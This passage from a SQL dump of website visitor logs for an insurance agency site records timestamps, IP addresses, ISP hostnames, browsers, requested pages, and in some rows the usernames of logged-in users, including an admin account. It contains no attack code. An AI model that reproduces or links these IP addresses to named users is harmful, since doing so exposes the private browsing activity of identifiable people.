9','','','','','','','','0','0',0),(190,'0b_68563eb8c5a41c683f8fc13e2303864b','1457020966','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(193,'0b_68563eb8c5a41c683f8fc13e2303864b','1457020967','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(196,'0b_3e3f37cf69639af5c64b075c9a14e18d','1457021083','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(199,'0b_68563eb8c5a41c683f8fc13e2303864b','1457021179','108.58.88.178','ool-6c3a58b2.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(200,'0b_68563eb8c5a41c683f8fc13e2303864b','1457021203','108.58.88.178','ool-6c3a58b2.static.optonline.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/case-status/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','51',0),(202,'0b_2560216ec2a812b9c9035915f5c7ad74','1457021321','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(203,'0b_3e3f37cf69639af5c64b075c9a14e18d','1457021449','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(206,'0b_3e3f37cf69639af5c64b075c9a14e18d','1457022294','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(209,'0b_e359878baea39eefe0f09b775cedd680','1457022470','180.76.15.27','baiduspider-180-76-15-27.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(211,'0b_33d31fb32accbd62a75e8803d66bd75f','1457023483','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(214,'0b_0531b18fc2b2da39e550d5db1f7c9f97','1457024230','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'WinVista','Chrome 48','us','','','','','','','0','0',0),(217,'0b_0531b18fc2b2da39e550d5db1f7c9f97','1457024232','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','','','','','','','0','0',0),(218,'0b_5e9fa4368e4421a3e3b35fc588d61f1b','1457024423','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(221,'0b_bc9cbbe360da1fb717b7b618e3efcb7e','1457024585','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(223,'0b_9ad6025c77b6c220084784a53418c196','1457025174','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(226,'0b_9ad6025c77b6c220084784a53418c196','1457025177','195.154.185.20','195-154-185-20.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(229,'0b_6350439923d767ff78bfe0f9df6b6324','1457025271','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(232,'0b_6350439923d767ff78bfe0f9df6b6324','1457025296','157.55.39.236','msnbot-157-55-39-236.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(233,'0b_bc9cbbe360da1fb717b7b618e3efcb7e','1457025375','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(236,'0b_5e9fa4368e4421a3e3b35fc588d61f1b','1457025489','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(239,'0b_5e9fa4368e4421a3e3b35fc588d61f1b','1457025736','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(242,'0b_5e9fa4368e4421a3e3b35fc588d61f1b','1457025950','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(244,'0b_5106b60dde80df74b277361c4c3d2e13','1457026648','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(245,'0b_5106b60dde80df74b277361c4c3d2e13','1457026650','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(247,'0b_23b846ea65795525f63670f78ea5c6ad','1457028141','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(248,'0b_23b846ea65795525f63670f78ea5c6ad','1457028142','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(251,'0b_23b846ea65795525f63670f78ea5c6ad','1457028146','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1600 x 900','','','','','','0','0',0),(254,'0b_c2be2a97c9985d1958f18101666893f1','1457028369','104.246.54.244','ool-68f636f4.dyn.optonline.net','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwim5777jKXLAhWMGD4KHcNeCYEQFggcMAA&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.115339255,d.cWw','',0,'Win7 x64','IE 10','us','1600 x 900','','','','','','0','0',0),(256,'0b_c2be2a97c9985d1958f18101666893f1','1457028371','104.246.54.244','ool-68f636f4.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1600 x 900','','','','','','0','0',0),(259,'0b_c2be2a97c9985d1958f18101666893f1','1457028378','104.246.54.244','ool-68f636f4.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)','http://www.empireins.com/','',0,'Win7 x64','IE 10','us','1600 x 900','','','','','','0','0',0),(262,'0b_7138c9f35b0d68e961195150037179cd','1457028605','198.167.168.70','198.167.168.70','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(263,'0b_d10bd35c82703004303ad2162897b0d9','1457028683','198.167.168.70','198.167.168.70','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','Jschwinder','','0','0',0),(266,'0b_966d9c0bf32a19d1fafebe9552f500e9','1457029381','108.29.136.81','static-108-29-136-81.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','','','','','','','0','0',0),(268,'0b_966d9c0bf32a19d1fafebe9552f500e9','1457029382','108.29.136.81','static-108-29-136-81.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','','','','','','','0','0',0),(271,'0b_1b53202f20fa7334f5fc02483cf4e05a','1457029389','66.249.75.96','crawl-66-249-75-96.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(274,'0b_f0d325cb3e92c9f013c73171c40b6e2c','1457029559','107.173.201.163','107-173-201-163-host.colocrossing.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 39','us','','','','','','','0','0',0),(275,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457030793','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(278,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457030794','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(281,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457030811','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(283,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457030823','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(286,'0b_e4ff05f5d9f5e5a808c89b55ae118af9','1457031113','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(289,'0b_e4ff05f5d9f5e5a808c89b55ae118af9','1457031156','207.46.13.96','msnbot-207-46-13-96.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(292,'0b_5f4cbfc31ebccbafb41975f5ced2a809','1457032294','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(293,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457032572','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(295,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457032572','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(296,'0b_f2ab76a2f5506de908b7d6aa2a409b94','1457032579','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(298,'0b_5f4cbfc31ebccbafb41975f5ced2a809','1457032857','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(299,'0b_b05d418c5c255adb742077f75c4fbc72','1457033624','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(302,'0b_b05d418c5c255adb742077f75c4fbc72','1457033625','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(304,'0b_a12591cc85904973456e4346f776c31f','1457034514','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(307,'0b_a12591cc85904973456e4346f776c31f','1457034515','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 2.0.50727; .NET CLR 3.5.30729)','http://www.empireins.com/','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(310,'0b_b05d418c5c255adb742077f75c4fbc72','1457035129','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(313,'0b_8398956291036949188d029e30ea6802','1457036651','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(314,'0b_20f782ccdc7aed8b917a4a43353d8fff','1457036675','24.0.101.177','c-24-0-101-177.hsd1.nj.comcast.net','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(317,'0b_20f782ccdc7aed8b917a4a43353d8fff','1457036676','24.0.101.177','c-24-0-101-177.hsd1.nj.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(319,'0b_be6098977aeeda8c88cf3e150d6f2744','1457036700','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(322,'0b_be6098977aeeda8c88cf3e150d6f2744','1457036701','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(325,'0b_623440797967ab77e5cdedb5a79def72','1457037049','24.0.101.177','c-24-0-101-177.hsd1.nj.comcast.net','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G920P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(328,'0b_623440797967ab77e5cdedb5a79def72','1457037050','24.0.101.177','c-24-0-101-177.hsd1.nj.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G920P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(331,'0b_762a4eb30eb1e082e8adccb7970b8091','1457037360','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(334,'0b_762a4eb30eb1e082e8adccb7970b8091','1457037361','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(335,'0b_762a4eb30eb1e082e8adccb7970b8091','1457037364','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(337,'0b_762a4eb30eb1e082e8adccb7970b8091','1457037370','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(338,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037625','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(340,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037626','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(343,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037630','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(344,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037680','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(347,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037681','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(350,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037687','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','','','0','0',0),(352,'0b_c9a4c9e8a7259ab6e5b7b42d573c1868','1457037702','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(355,'0b_c9a4c9e8a7259ab6e5b7b42d573c1868','1457037703','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(358,'0b_c9a4c9e8a7259ab6e5b7b42d573c1868','1457037706','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(361,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037733','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','Shmuli','','0','51',0),(362,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037741','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 48','us','1920 x 1080','','','','Shmuli','','0','51',0),(364,'0b_1a8143347ee555536fde18d0a74f0a8f','1457037769','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 48','us','1280 x 1024','','','','Shmuli','','0','51',0),(367,'0b_6e81058a425f7423299bfeb4360f2a2d','1457038357','66.249.75.96','crawl-66-249-75-96.googlebot.com','/term-quotes/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(370,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039221','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','admin','','0','0',0),(371,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039222','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','admin','','0','0',0),(374,'0b_762a4eb30eb1e082e8adccb7970b8091','1457039303','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(376,'0b_762a4eb30eb1e082e8adccb7970b8091','1457039305','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(379,'0b_762a4eb30eb1e082e8adccb7970b8091','1457039308','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(380,'0b_762a4eb30eb1e082e8adccb7970b8091','1457039313','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(382,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039424','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/?preview=true&preview_id=306&preview_nonce=74669b15d8','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/post.php?post=306&action=edit','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(385,'0b_1b8cd993de2d7dfae4b6c7860678d0c7','1457039465','108.58.88.178','ool-6c3a58b2.static.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 